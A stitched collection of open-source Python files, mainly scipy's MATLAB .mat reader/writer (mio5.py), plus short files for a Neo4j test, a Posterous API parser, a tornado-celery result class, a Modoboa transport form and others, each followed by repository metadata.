* 3 int8 strings
* a matrix
It seems that, whenever the mat file contains a ``mxOPAQUE_CLASS``
instance, there is also an un-named matrix (name == '') at the end of
the mat file. I'll call this the ``__function_workspace__`` matrix.
When I saved two anonymous functions in a mat file, or appended another
anonymous function to the mat file, there was still only one
``__function_workspace__`` un-named matrix at the end, but larger than
that for a mat file with a single anonymous function, suggesting that
the workspaces for the two functions had been merged.
The ``__function_workspace__`` matrix appears to be of double class
(``mxCLASS_DOUBLE``), but stored as uint8, the memory for which is in
the format of a mini .mat file, without the first 124 bytes of the file
header (the description and the subsystem_offset), but with the version
U2 bytes, and the S2 endian test bytes. There follow 4 zero bytes,
presumably for 8 byte padding, and then a series of ``miMATRIX``
entries, as in a standard mat file. The ``miMATRIX`` entries appear to
be series of un-named (name == '') matrices, and may also contain arrays
of this same mini-mat format.
I guess that:
* saving an anonymous function back to a mat file will need the
associated ``__function_workspace__`` matrix saved as well for the
anonymous function to work correctly.
* appending to a mat file that has a ``__function_workspace__`` would
involve first pulling off this workspace, appending, checking whether
there were any more anonymous functions appended, and then somehow
merging the relevant workspaces, and saving at the end of the mat
file.
The mat files I was playing with are in ``tests/data``:
* sqr.mat
* parabola.mat
* some_functions.mat
See ``tests/test_mio.py:test_mio_funcs.py`` for a debugging
script I was working with.
'''
# Small fragments of current code adapted from matfile.py by Heiko
# Henkelmann
import os
import time
import sys
import zlib
from io import BytesIO
import warnings
import numpy as np
from numpy.compat import asbytes, asstr
import scipy.sparse
from scipy._lib.six import string_types
from .byteordercodes import native_code, swapped_code
from .miobase import (MatFileReader, docfiller, matdims, read_dtype,
arr_to_chars, arr_dtype_number, MatWriteError,
MatReadError, MatReadWarning)
# Reader object for matlab 5 format variables
from .mio5_utils import VarReader5
# Constants and helper objects
from .mio5_params import (MatlabObject, MatlabFunction, MDTYPES, NP_TO_MTYPES,
NP_TO_MXTYPES, miCOMPRESSED, miMATRIX, miINT8,
miUTF8, miUINT32, mxCELL_CLASS, mxSTRUCT_CLASS,
mxOBJECT_CLASS, mxCHAR_CLASS, mxSPARSE_CLASS,
mxDOUBLE_CLASS, mclass_info)
from .streams import ZlibInputStream
class MatFile5Reader(MatFileReader):
''' Reader for Mat 5 mat files
Adds the following attribute to base class
uint16_codec - char codec to use for uint16 char arrays
(defaults to system default codec)
Uses variable reader that has the following stardard interface (see
abstract class in ``miobase``::
__init__(self, file_reader)
read_header(self)
array_from_header(self)
and added interface::
set_stream(self, stream)
read_full_tag(self)
'''
@docfiller
def __init__(self,
mat_stream,
byte_order=None,
mat_dtype=False,
squeeze_me=False,
chars_as_strings=True,
matlab_compatible=False,
struct_as_record=True,
verify_compressed_data_integrity=True,
uint16_codec=None
):
'''Initializer for matlab 5 file format reader
%(matstream_arg)s
%(load_args)s
%(struct_arg)s
uint16_codec : {None, string}
Set codec to use for uint16 char arrays (e.g. 'utf-8').
Use system default codec if None
'''
super(MatFile5Reader, self).__init__(
mat_stream,
byte_order,
mat_dtype,
squeeze_me,
chars_as_strings,
matlab_compatible,
struct_as_record,
verify_compressed_data_integrity
)
# Set uint16 codec
if not uint16_codec:
uint16_codec = sys.getdefaultencoding()
self.uint16_codec = uint16_codec
# placeholders for readers - see initialize_read method
self._file_reader = None
self._matrix_reader = None
def guess_byte_order(self):
''' Guess byte order.
Sets stream pointer to 0 '''
self.mat_stream.seek(126)
mi = self.mat_stream.read(2)
self.mat_stream.seek(0)
return mi == b'IM' and '<' or '>'
def read_file_header(self):
''' Read in mat 5 file header '''
hdict = {}
hdr_dtype = MDTYPES[self.byte_order]['dtypes']['file_header']
hdr = read_dtype(self.mat_stream, hdr_dtype)
hdict['__header__'] = hdr['description'].item().strip(b' \t\n\000')
v_major = hdr['version'] >> 8
v_minor = hdr['version'] & 0xFF
hdict['__version__'] = '%d.%d' % (v_major, v_minor)
return hdict
def initialize_read(self):
''' Run when beginning read of variables
Sets up readers from parameters in `self`
'''
# reader for top level stream. We need this extra top-level
# reader because we use the matrix_reader object to contain
# compressed matrices (so they have their own stream)
self._file_reader = VarReader5(self)
# reader for matrix streams
self._matrix_reader = VarReader5(self)
def read_var_header(self):
''' Read header, return header, next position
Header has to define at least .name and .is_global
Parameters
----------
None
Returns
-------
header : object
object that can be passed to self.read_var_array, and that
has attributes .name and .is_global
next_position : int
position in stream of next variable
'''
mdtype, byte_count = self._file_reader.read_full_tag()
if not byte_count > 0:
raise ValueError("Did not read any bytes")
next_pos = self.mat_stream.tell() + byte_count
if mdtype == miCOMPRESSED:
# Make new stream from compressed data
stream = ZlibInputStream(self.mat_stream, byte_count)
self._matrix_reader.set_stream(stream)
check_stream_limit = self.verify_compressed_data_integrity
mdtype, byte_count = self._matrix_reader.read_full_tag()
else:
check_stream_limit = False
self._matrix_reader.set_stream(self.mat_stream)
if not mdtype == miMATRIX:
raise TypeError('Expecting miMATRIX type here, got %d' % mdtype)
header = self._matrix_reader.read_header(check_stream_limit)
return header, next_pos
def read_var_array(self, header, process=True):
''' Read array, given `header`
Parameters
----------
header : header object
object with fields defining variable header
process : {True, False} bool, optional
If True, apply recursive post-processing during loading of
array.
Returns
-------
arr : array
array with post-processing applied or not according to
`process`.
'''
return self._matrix_reader.array_from_header(header, process)
def get_variables(self, variable_names=None):
''' get variables from stream as dictionary
variable_names - optional list of variable names to get
If variable_names is None, then get all variables in file
'''
if isinstance(variable_names, string_types):
variable_names = [variable_names]
elif variable_names is not None:
variable_names = list(variable_names)
self.mat_stream.seek(0)
# Here we pass all the parameters in self to the reading objects
self.initialize_read()
mdict = self.read_file_header()
mdict['__globals__'] = []
while not self.end_of_stream():
hdr, next_position = self.read_var_header()
name = asstr(hdr.name)
if name in mdict:
warnings.warn('Duplicate variable name "%s" in stream'
' - replacing previous with new\n'
'Consider mio5.varmats_from_mat to split '
'file into single variable files' % name,
MatReadWarning, stacklevel=2)
if name == '':
# can only be a matlab 7 function workspace
name = '__function_workspace__'
# We want to keep this raw because mat_dtype processing
# will break the format (uint8 as mxDOUBLE_CLASS)
process = False
else:
process = True
if variable_names is not None and name not in variable_names:
self.mat_stream.seek(next_position)
continue
try:
res = self.read_var_array(hdr, process)
except MatReadError as err:
warnings.warn(
'Unreadable variable "%s", because "%s"' %
(name, err),
Warning, stacklevel=2)
res = "Read error: %s" % err
self.mat_stream.seek(next_position)
mdict[name] = res
if hdr.is_global:
mdict['__globals__'].append(name)
if variable_names is not None:
variable_names.remove(name)
if len(variable_names) == 0:
break
return mdict
def list_variables(self):
''' list variables from stream '''
self.mat_stream.seek(0)
# Here we pass all the parameters in self to the reading objects
self.initialize_read()
self.read_file_header()
vars = []
while not self.end_of_stream():
hdr, next_position = self.read_var_header()
name = asstr(hdr.name)
if name == '':
# can only be a matlab 7 function workspace
name = '__function_workspace__'
shape = self._matrix_reader.shape_from_header(hdr)
if hdr.is_logical:
info = 'logical'
else:
info = mclass_info.get(hdr.mclass, 'unknown')
vars.append((name, shape, info))
self.mat_stream.seek(next_position)
return vars
def varmats_from_mat(file_obj):
""" Pull variables out of mat 5 file as a sequence of mat file objects
This can be useful with a difficult mat file, containing unreadable
variables. This routine pulls the variables out in raw form and puts them,
unread, back into a file stream for saving or reading. Another use is the
pathological case where there is more than one variable of the same name in
the file; this routine returns the duplicates, whereas the standard reader
will overwrite duplicates in the returned dictionary.
The file pointer in `file_obj` will be undefined. File pointers for the
returned file-like objects are set at 0.
Parameters
----------
file_obj : file-like
file object containing mat file
Returns
-------
named_mats : list
list contains tuples of (name, BytesIO) where BytesIO is a file-like
object containing mat file contents as for a single variable. The
BytesIO contains a string with the original header and a single var. If
``var_file_obj`` is an individual BytesIO instance, then save as a mat
file with something like ``open('test.mat',
'wb').write(var_file_obj.read())``
Examples
--------
>>> import scipy.io
BytesIO is from the ``io`` module in python 3, and is ``cStringIO`` for
python < 3.
>>> mat_fileobj = BytesIO()
>>> scipy.io.savemat(mat_fileobj, {'b': np.arange(10), 'a': 'a string'})
>>> varmats = varmats_from_mat(mat_fileobj)
>>> sorted([name for name, str_obj in varmats])
['a', 'b']
"""
rdr = MatFile5Reader(file_obj)
file_obj.seek(0)
# Raw read of top-level file header
hdr_len = MDTYPES[native_code]['dtypes']['file_header'].itemsize
raw_hdr = file_obj.read(hdr_len)
# Initialize variable reading
file_obj.seek(0)
rdr.initialize_read()
mdict = rdr.read_file_header()
next_position = file_obj.tell()
named_mats = []
while not rdr.end_of_stream():
start_position = next_position
hdr, next_position = rdr.read_var_header()
name = asstr(hdr.name)
# Read raw variable string
file_obj.seek(start_position)
byte_count = next_position - start_position
var_str = file_obj.read(byte_count)
# write to stringio object
out_obj = BytesIO()
out_obj.write(raw_hdr)
out_obj.write(var_str)
out_obj.seek(0)
named_mats.append((name, out_obj))
return named_mats
class EmptyStructMarker(object):
""" Class to indicate presence of empty matlab struct on output """
def to_writeable(source):
''' Convert input object ``source`` to something we can write
Parameters
----------
source : object
Returns
-------
arr : None or ndarray or EmptyStructMarker
If `source` cannot be converted to something we can write to a matfile,
return None. If `source` is equivalent to an empty dictionary, return
``EmptyStructMarker``. Otherwise return `source` converted to an
ndarray with contents for writing to matfile.
'''
if isinstance(source, np.ndarray):
return source
if source is None:
return None
# Objects that implement mappings
is_mapping = (hasattr(source, 'keys') and hasattr(source, 'values') and
hasattr(source, 'items'))
# Objects that don't implement mappings, but do have dicts
if isinstance(source, np.generic):
# Numpy scalars are never mappings (pypy issue workaround)
pass
elif not is_mapping and hasattr(source, '__dict__'):
source = dict((key, value) for key, value in source.__dict__.items()
if not key.startswith('_'))
is_mapping = True
if is_mapping:
dtype = []
values = []
for field, value in source.items():
if (isinstance(field, string_types) and
field[0] not in '_0123456789'):
dtype.append((str(field), object))
values.append(value)
if dtype:
return np.array([tuple(values)], dtype)
else:
return EmptyStructMarker
# Next try and convert to an array
narr = np.asanyarray(source)
if narr.dtype.type in (object, np.object_) and \
narr.shape == () and narr == source:
# No interesting conversion possible
return None
return narr
# Native byte ordered dtypes for convenience for writers
NDT_FILE_HDR = MDTYPES[native_code]['dtypes']['file_header']
NDT_TAG_FULL = MDTYPES[native_code]['dtypes']['tag_full']
NDT_TAG_SMALL = MDTYPES[native_code]['dtypes']['tag_smalldata']
NDT_ARRAY_FLAGS = MDTYPES[native_code]['dtypes']['array_flags']
class VarWriter5(object):
''' Generic matlab matrix writing class '''
mat_tag = np.zeros((), NDT_TAG_FULL)
mat_tag['mdtype'] = miMATRIX
def __init__(self, file_writer):
self.file_stream = file_writer.file_stream
self.unicode_strings = file_writer.unicode_strings
self.long_field_names = file_writer.long_field_names
self.oned_as = file_writer.oned_as
# These are used for top level writes, and unset after
self._var_name = None
self._var_is_global = False
def write_bytes(self, arr):
self.file_stream.write(arr.tostring(order='F'))
def write_string(self, s):
self.file_stream.write(s)
def write_element(self, arr, mdtype=None):
''' write tag and data '''
if mdtype is None:
mdtype = NP_TO_MTYPES[arr.dtype.str[1:]]
# Array needs to be in native byte order
if arr.dtype.byteorder == swapped_code:
arr = arr.byteswap().newbyteorder()
byte_count = arr.size*arr.itemsize
if byte_count <= 4:
self.write_smalldata_element(arr, mdtype, byte_count)
else:
self.write_regular_element(arr, mdtype, byte_count)
def write_smalldata_element(self, arr, mdtype, byte_count):
# write tag with embedded data
tag = np.zeros((), NDT_TAG_SMALL)
tag['byte_count_mdtype'] = (byte_count << 16) + mdtype
# if arr.tostring is < 4, the element will be zero-padded as needed.
tag['data'] = arr.tostring(order='F')
self.write_bytes(tag)
def write_regular_element(self, arr, mdtype, byte_count):
# write tag, data
tag = np.zeros((), NDT_TAG_FULL)
tag['mdtype'] = mdtype
tag['byte_count'] = byte_count
self.write_bytes(tag)
self.write_bytes(arr)
# pad to next 64-bit boundary
bc_mod_8 = byte_count % 8
if bc_mod_8:
self.file_stream.write(b'\x00' * (8-bc_mod_8))
def write_header(self,
shape,
mclass,
is_complex=False,
is_logical=False,
nzmax=0):
''' Write header for given data options
shape : sequence
array shape
mclass - mat5 matrix class
is_complex - True if matrix is complex
is_logical - True if matrix is logical
nzmax - max non zero elements for sparse arrays
We get the name and the global flag from the object, and reset
them to defaults after we've used them
'''
# get name and is_global from one-shot object store
name = self._var_name
is_global = self._var_is_global
# initialize the top-level matrix tag, store position
self._mat_tag_pos = self.file_stream.tell()
self.write_bytes(self.mat_tag)
# write array flags (complex, global, logical, class, nzmax)
af = np.zeros((), NDT_ARRAY_FLAGS)
af['data_type'] = miUINT32
af['byte_count'] = 8
flags = is_complex << 3 | is_global << 2 | is_logical << 1
af['flags_class'] = mclass | flags << 8
af['nzmax'] = nzmax
self.write_bytes(af)
# shape
self.write_element(np.array(shape, dtype='i4'))
# write name
name = np.asarray(name)
if name == '': # empty string zero-terminated
self.write_smalldata_element(name, miINT8, 0)
else:
self.write_element(name, miINT8)
# reset the one-shot store to defaults
self._var_name = ''
self._var_is_global = False
def update_matrix_tag(self, start_pos):
curr_pos = self.file_stream.tell()
self.file_stream.seek(start_pos)
byte_count = curr_pos - start_pos - 8
if byte_count >= 2**32:
raise MatWriteError("Matrix too large to save with Matlab "
"5 format")
self.mat_tag['byte_count'] = byte_count
self.write_bytes(self.mat_tag)
self.file_stream.seek(curr_pos)
def write_top(self, arr, name, is_global):
""" Write variable at top level of mat file
Parameters
----------
arr : array_like
array-like object to create writer for
name : str, optional
name as it will appear in matlab workspace
default is empty string
is_global : {False, True}, optional
whether variable will be global on load into matlab
"""
# these are set before the top-level header write, and unset at
# the end of the same write, because they do not apply for lower levels
self._var_is_global = is_global
self._var_name = name
# write the header and data
self.write(arr)
def write(self, arr):
''' Write `arr` to stream at top and sub levels
Parameters
----------
arr : array_like
array-like object to create writer for
'''
# store position, so we can update the matrix tag
mat_tag_pos = self.file_stream.tell()
# First check if these are sparse
if scipy.sparse.issparse(arr):
self.write_sparse(arr)
self.update_matrix_tag(mat_tag_pos)
return
# Try to convert things that aren't arrays
narr = to_writeable(arr)
if narr is None:
raise TypeError('Could not convert %s (type %s) to array'
% (arr, type(arr)))
if isinstance(narr, MatlabObject):
self.write_object(narr)
elif isinstance(narr, MatlabFunction):
raise MatWriteError('Cannot write matlab functions')
elif narr is EmptyStructMarker: # empty struct array
self.write_empty_struct()
elif narr.dtype.fields: # struct array
self.write_struct(narr)
elif narr.dtype.hasobject: # cell array
self.write_cells(narr)
elif narr.dtype.kind in ('U', 'S'):
if self.unicode_strings:
codec = 'UTF8'
else:
codec = 'ascii'
self.write_char(narr, codec)
else:
self.write_numeric(narr)
self.update_matrix_tag(mat_tag_pos)
def write_numeric(self, arr):
imagf = arr.dtype.kind == 'c'
logif = arr.dtype.kind == 'b'
try:
mclass = NP_TO_MXTYPES[arr.dtype.str[1:]]
except KeyError:
# No matching matlab type, probably complex256 / float128 / float96
# Cast data to complex128 / float64.
if imagf:
arr = arr.astype('c128')
elif logif:
arr = arr.astype('i1') # Should only contain 0/1
else:
arr = arr.astype('f8')
mclass = mxDOUBLE_CLASS
self.write_header(matdims(arr, self.oned_as),
mclass,
is_complex=imagf,
is_logical=logif)
if imagf:
self.write_element(arr.real)
self.write_element(arr.imag)
else:
self.write_element(arr)
def write_char(self, arr, codec='ascii'):
''' Write string array `arr` with given `codec`
'''
if arr.size == 0 or np.all(arr == ''):
# This an empty string array or a string array containing
# only empty strings. Matlab cannot distiguish between a
# string array that is empty, and a string array containing
# only empty strings, because it stores strings as arrays of
# char. There is no way of having an array of char that is
# not empty, but contains an empty string. We have to
# special-case the array-with-empty-strings because even
# empty strings have zero padding, which would otherwise
# appear in matlab as a string with a space.
shape = (0,) * np.max([arr.ndim, 2])
self.write_header(shape, mxCHAR_CLASS)
self.write_smalldata_element(arr, miUTF8, 0)
return
# non-empty string.
#
# Convert to char array
arr = arr_to_chars(arr)
# We have to write the shape directly, because we are going
# recode the characters, and the resulting stream of chars
# may have a different length
shape = arr.shape
self.write_header(shape, mxCHAR_CLASS)
if arr.dtype.kind == 'U' and arr.size:
# Make one long string from all the characters. We need to
# transpose here, because we're flattening the array, before
# we write the bytes. The bytes have to be written in
# Fortran order.
n_chars = np.product(shape)
st_arr = np.ndarray(shape=(),
dtype=arr_dtype_number(arr, n_chars),
buffer=arr.T.copy()) # Fortran order
# Recode with codec to give byte string
st = st_arr.item().encode(codec)
# Reconstruct as one-dimensional byte array
arr = np.ndarray(shape=(len(st),),
dtype='S1',
buffer=st)
self.write_element(arr, mdtype=miUTF8)
def write_sparse(self, arr):
''' Sparse matrices are 2D
'''
A = arr.tocsc() # convert to sparse CSC format
A.sort_indices() # MATLAB expects sorted row indices
is_complex = (A.dtype.kind == 'c')
is_logical = (A.dtype.kind == 'b')
nz = A.nnz
self.write_header(matdims(arr, self.oned_as),
mxSPARSE_CLASS,
is_complex=is_complex,
is_logical=is_logical,
# matlab won't load file with 0 nzmax
nzmax=1 if nz == 0 else nz)
self.write_element(A.indices.astype('i4'))
self.write_element(A.indptr.astype('i4'))
self.write_element(A.data.real)
if is_complex:
self.write_element(A.data.imag)
def write_cells(self, arr):
self.write_header(matdims(arr, self.oned_as),
mxCELL_CLASS)
# loop over data, column major
A = np.atleast_2d(arr).flatten('F')
for el in A:
self.write(el)
def write_empty_struct(self):
self.write_header((1, 1), mxSTRUCT_CLASS)
# max field name length set to 1 in an example matlab struct
self.write_element(np.array(1, dtype=np.int32))
# Field names element is empty
self.write_element(np.array([], dtype=np.int8))
def write_struct(self, arr):
self.write_header(matdims(arr, self.oned_as),
mxSTRUCT_CLASS)
self._write_items(arr)
def _write_items(self, arr):
# write fieldnames
fieldnames = [f[0] for f in arr.dtype.descr]
length = max([len(fieldname) for fieldname in fieldnames])+1
max_length = (self.long_field_names and 64) or 32
if length > max_length:
raise ValueError("Field names are restricted to %d characters" %
(max_length-1))
self.write_element(np.array([length], dtype='i4'))
self.write_element(
np.array(fieldnames, dtype='S%d' % (length)),
mdtype=miINT8)
A = np.atleast_2d(arr).flatten('F')
for el in A:
for f in fieldnames:
self.write(el[f])
def write_object(self, arr):
'''Same as writing structs, except different mx class, and extra
classname element after header
'''
self.write_header(matdims(arr, self.oned_as),
mxOBJECT_CLASS)
self.write_element(np.array(arr.classname, dtype='S'),
mdtype=miINT8)
self._write_items(arr)
class MatFile5Writer(object):
''' Class for writing mat5 files '''
@docfiller
def __init__(self, file_stream,
do_compression=False,
unicode_strings=False,
global_vars=None,
long_field_names=False,
oned_as='row'):
''' Initialize writer for matlab 5 format files
Parameters
----------
%(do_compression)s
%(unicode_strings)s
global_vars : None or sequence of strings, optional
Names of variables to be marked as global for matlab
%(long_fields)s
%(oned_as)s
'''
self.file_stream = file_stream
self.do_compression = do_compression
self.unicode_strings = unicode_strings
if global_vars:
self.global_vars = global_vars
else:
self.global_vars = []
self.long_field_names = long_field_names
self.oned_as = oned_as
self._matrix_writer = None
def write_file_header(self):
# write header
hdr = np.zeros((), NDT_FILE_HDR)
hdr['description'] = 'MATLAB 5.0 MAT-file Platform: %s, Created on: %s' \
% (os.name,time.asctime())
hdr['version'] = 0x0100
hdr['endian_test'] = np.ndarray(shape=(),
dtype='S2',
buffer=np.uint16(0x4d49))
self.file_stream.write(hdr.tostring())
def put_variables(self, mdict, write_header=None):
''' Write variables in `mdict` to stream
Parameters
----------
mdict : mapping
mapping with method ``items`` returns name, contents pairs where
``name`` which will appear in the matlab workspace in file load, and
``contents`` is something writeable to a matlab file, such as a numpy
array.
write_header : {None, True, False}, optional
If True, then write the matlab file header before writing the
variables. If None (the default) then write the file header
if we are at position 0 in the stream. By setting False
here, and setting the stream position to the end of the file,
you can append variables to a matlab file
'''
# write header if requested, or None and start of file
if write_header is None:
write_header = self.file_stream.tell() == 0
if write_header:
self.write_file_header()
self._matrix_writer = VarWriter5(self)
for name, var in mdict.items():
if name[0] == '_':
continue
is_global = name in self.global_vars
if self.do_compression:
stream = BytesIO()
self._matrix_writer.file_stream = stream
self._matrix_writer.write_top(var, asbytes(name), is_global)
out_str = zlib.compress(stream.getvalue())
tag = np.empty((), NDT_TAG_FULL)
tag['mdtype'] = miCOMPRESSED
tag['byte_count'] = len(out_str)
self.file_stream.write(tag.tostring())
self.file_stream.write(out_str)
else: # not compressing
self._matrix_writer.write_top(var, asbytes(name), is_global)
|
kenshay/ImageScript
|
ProgramData/SystemFiles/Python/Lib/site-packages/scipy/io/matlab/mio5.py
|
Python
|
gpl-3.0
| 31,895
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 - 2019 Brian R. D'Urso
#
# This file is part of Python Instrument Control System, also known as Pythics.
#
# Pythics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pythics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pythics. If not, see <http://www.gnu.org/licenses/>.
#
__all__ = ['lib']
|
dursobr/Pythics
|
pythics/__init__.py
|
Python
|
gpl-3.0
| 802
|
#hw 1/ task8/ Sergei Shybkoi
t = (1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 'a', 'b', 'c')
print "Set:",t
print "Each third element:"
print t[2::3]
print t[-1*len(t)+2:-1:3]
|
pybursa/homeworks
|
s_shybkoy/hw1/hw1_task8_ShybkoiSergei.py
|
Python
|
gpl-2.0
| 162
|
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neo4j import Query
# TODO: this test will stay until a uniform behavior for `.single()` across the
# drivers has been specified and tests are created in testkit
def test_result_single_record_value(session):
record = session.run(Query("RETURN $x"), x=1).single()
assert record.value() == 1
|
neo4j/neo4j-python-driver
|
tests/integration/test_autocommit.py
|
Python
|
apache-2.0
| 951
|
# Copyright:
# Copyright (c) 2010, Benjamin Reitzammer <http://github.com/nureineide>,
# All rights reserved.
#
# License:
# This program is free software. You can distribute/modify this program under
# the terms of the Apache License Version 2.0 available at
# http://www.apache.org/licenses/LICENSE-2.0.txt
import xml.etree.cElementTree as ET
from posterous.models import ModelFactory, attribute_map
#from posterous.utils import import_simplejson
import json
from posterous.error import PosterousError
def set_type(name, value):
"""Sets the value to the appropriate type."""
for names in attribute_map:
if name in names:
return attribute_map.get(names)(value)
# most likely a string
return value
class XMLDict(dict):
"""
Traverses the XML tree recursively and builds an object
representation of each element. Element attributes are not
read since they don't appear in any current Posterous API
response. Returns a dictionary of objects.
Modified from: http://code.activestate.com/recipes/410469/
"""
def __init__(self, parent_element):
childrenNames = list((child.tag for child in parent_element))
for element in parent_element:
tag = element.tag.lower()
if element:
if len(element) == 1 or element[0].tag != element[1].tag:
# we assume that if the first two tags in a series are
# different, then they are all different.
aDict = XMLDict(element)
else:
# treat like list
aDict = {element[0].tag.lower(): XMLList(element)}
if childrenNames.count(tag) > 1:
# there are multiple siblings with this tag, so they
# must be grouped together
try:
# move this element's dict under the first sibling
self[tag].append(aDict)
except KeyError:
# the first for this tag
self.update({tag: [aDict]})
else:
self.update({tag: aDict})
else:
# finally, if there are no child tags, extract the text
value = set_type(tag, element.text.strip())
if childrenNames.count(tag) > 1:
# there are multiple instances of this tag, so they
# must be grouped together
try:
# append this tags text to the tag's matching list
self[tag].append(value)
except KeyError:
# the first for this tag
self.update({tag: [value]})
else:
self.update({tag: value})
class XMLList(list):
"""
Similar to the XMLDict class; traverses a list of element
siblings and creates a list of their values.
Modified from: http://code.activestate.com/recipes/410469/
"""
def __init__(self, aList):
for element in aList:
if element:
if len(element) == 1 or element[0].tag != element[1].tag:
self.append(XMLDict(element))
else:
self.append(XMLList(element))
elif element.text:
text = set_type(element.tag.lower(), element.text.strip())
if text:
self.append(text)
class XMLParser(object):
def __init__(self):
pass
def parse(self, method, payload):
"""Parses the XML payload and returns a dict of objects"""
root = ET.XML(payload)
if root.tag != 'rsp':
raise PosterousError('XML response is missing the status tag! ' \
'The response may be malformed.')
# Verify that the response was successful before parsing
if root.get('stat') == 'fail':
error = root[0]
self.parse_error(error)
else:
# There are nesting inconsistencies in the response XML
# with some tags appearing below the payload model element.
# This is a problem when the payload_type is _not_ a list.
# If the root has multiple children, all siblings of the first
# child will be moved under said child.
if not method.payload_list and len(root) > 1:
for node in root[1:]:
root[0].append(node)
root.remove(node)
if method.payload_list:
# A list of results is expected
result = []
for node in root:
result.append(XMLDict(node))
else:
# Move to the first child before parsing the tree
result = XMLDict(root[0])
# Make sure the values are formatted properly
return self.cleanup(result)
def parse_error(self, error):
raise PosterousError(error.get('msg'), error.get('code'))
def cleanup(self, output):
def clean(obj):
if 'comment' in obj:
comments = obj['comment']
del obj['comment']
# make it a list
if not isinstance(comments, list):
comments = [comments]
obj['comments'] = comments
if 'media' in obj:
# make it a list
if not isinstance(obj['media'], list):
obj['media'] = [obj['media']]
return obj
if isinstance(output, list):
output = list((clean(obj) for obj in output))
else:
output = clean(output)
return output
class JSONParser(object):
def __init__(self):
pass
def parse(self, method, payload):
output = json.loads(payload)
return output
class ModelParser(object):
"""Used for parsing a method response into a model object."""
def __init__(self, model_factory=None):
self.model_factory = model_factory or ModelFactory
def parse(self, method, payload):
# Get the appropriate model for this payload
try:
if method.payload_type is None:
return
model = getattr(self.model_factory, method.payload_type)
except AttributeError:
raise Exception('No model for this payload type: %s' %
method.payload_type)
# The payload XML must be parsed into a dict of objects before
# being used in the model.
if method.response_type == 'xml':
xml_parser = XMLParser()
data = xml_parser.parse(method, payload)
elif method.response_type == 'json':
json_parser = JSONParser()
data = json_parser.parse(method, payload)
else:
raise NotImplementedError
return model.parse(method.api, data)
|
jmoz/posterous-python-wp_fork
|
posterous/parsers.py
|
Python
|
mit
| 7,146
|
from __future__ import absolute_import
from __future__ import with_statement
from functools import partial
import celery
class AsyncResult(celery.result.AsyncResult):
def __init__(self, task_id, status=None, traceback=None,
result=None, producer=None, **kwargs):
super(AsyncResult, self).__init__(task_id)
self._status = status
self._traceback = traceback
self._result = result
self._producer = producer
@property
def status(self):
return self._status or super(AsyncResult, self).status
state = status
@property
def traceback(self):
if self._result is not None:
return self._traceback
else:
return super(AsyncResult, self).traceback
@property
def result(self):
return self._result or super(AsyncResult, self).result
def get(self, callback=None):
self._producer.fail_if_backend_not_supported()
self._producer.consumer.wait_for(self.task_id,
partial(self.on_result, callback),
expires=self._producer.prepare_expires(type=int),
persistent=self._producer.app.conf.CELERY_RESULT_PERSISTENT)
def on_result(self, callback, reply):
reply = self._producer.decode(reply)
self._status = reply.get('status')
self._traceback = reply.get('traceback')
self._result = reply.get('result')
if callback:
callback(self._result)
def _get_task_meta(self):
self._producer.fail_if_backend_not_supported()
return super(AsyncResult, self)._get_task_meta()
def maybe_reraise(self):
if self.state in celery.states.PROPAGATE_STATES:
raise super(AsyncResult, self).result
|
qudos-com/tornado-celery
|
tcelery/result.py
|
Python
|
bsd-3-clause
| 1,841
|
# -*- coding: utf-8 -*-
"""Transport forms."""
from __future__ import unicode_literals
from django import forms
from . import backends, models
TYPE_TO_FIELD_MAP = {
"int": forms.IntegerField,
"boolean": forms.BooleanField,
"string": forms.CharField
}
class BackendSettingsMixin(object):
"""A mixin to deal with backend settings in a model form."""
def __init__(self, *args, **kwargs):
"""Constructor."""
super(BackendSettingsMixin, self).__init__(*args, **kwargs)
self.setting_field_names = []
def inject_backend_settings(self, name, settings):
"""Inject backend settings to form."""
for setting in settings:
fullname = "{}_{}".format(name, setting["name"])
options = {}
ftype = setting.get("type", "string")
if self.instance.pk:
options["initial"] = self.instance._settings.get(fullname)
elif "default" in setting:
options["initial"] = setting["default"]
if "widget" in setting:
options["widget"] = setting["widget"]
self.fields[fullname] = TYPE_TO_FIELD_MAP[ftype](
label=setting["label"], required=False, **options)
self.setting_field_names.append(fullname)
def clean_backend_fields(self, name):
"""Clean backend fields."""
self.backend = backends.manager.get_backend(name)
for field, error in self.backend.clean_fields(self.cleaned_data):
self.add_error(field, error)
def save(self, commit=True):
"""Set settings to JSON field."""
transport = super(BackendSettingsMixin, self).save(commit=False)
transport._settings = {
name: self.cleaned_data[name]
for name in self.setting_field_names
}
if commit:
transport.save()
return transport
class TransportForm(BackendSettingsMixin, forms.ModelForm):
"""Transport model form."""
service = forms.ChoiceField(choices=[])
class Meta:
fields = ("pattern", "service")
model = models.Transport
def __init__(self, *args, **kwargs):
"""Set backend list."""
super(TransportForm, self).__init__(*args, **kwargs)
self.fields["service"].choices = backends.manager.get_backend_list()
settings = backends.manager.get_all_backend_settings()
for name, backend_settings in settings.items():
self.inject_backend_settings(name, backend_settings)
@property
def setting_fields(self):
return [self[name] for name in self.setting_field_names]
def _clean_fields(self):
"""Make backend settings required."""
backend_name = self.data.get("service")
backend_settings = backends.manager.get_backend_settings(backend_name)
for name, field in self.fields.items():
if name.startswith("{}_".format(backend_name)):
name = name.replace("{}_".format(backend_name), "")
for setting in backend_settings:
if setting["name"] == name:
break
if setting.get("required", True):
field.required = True
return super(TransportForm, self)._clean_fields()
def clean(self):
"""Check values."""
cleaned_data = super(TransportForm, self).clean()
if self.errors:
return cleaned_data
self.clean_backend_fields(cleaned_data["service"])
return cleaned_data
|
tonioo/modoboa
|
modoboa/transport/forms.py
|
Python
|
isc
| 3,543
|
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
